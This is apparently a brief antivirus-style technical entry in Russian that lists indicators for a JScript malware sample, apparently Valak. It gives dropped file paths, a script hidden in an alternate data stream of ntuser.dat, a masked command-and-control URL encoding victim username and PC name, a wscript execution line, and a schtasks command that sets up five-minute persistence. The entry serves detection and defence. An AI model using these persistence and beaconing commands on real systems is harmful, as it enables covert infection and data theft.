Техническая информация
- <SYSTEM32>\tasks\regcontrol64
- %TEMP%\7512.js
- %HOMEPATH%\ntuser.dat:regctl.js
- %TEMP%\7512.js
- http://83.##6.250.42/raw.php/telemetry/77u_bm9uY2U9NmM0Yjc2MWEyOGI3MzRm/ZTkzODMxZTNmYjQwMGNlODcmdmVyc2lv/bj0xJmdpZD1wc2V1ZG8xJnNvZnQ9VmFs/YWsmdXNlcm5hbWU9dXNlciZwY25hbWU9/d2RxY21jaW1xeHJrJmRvbW...
- '%WINDIR%\syswow64\wscript.exe' %TEMP%\7512.js
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "RegControl64" /TR "wscript %HOMEPATH%\ntuser.dat:Regctl.js" /SC Minute /MO 5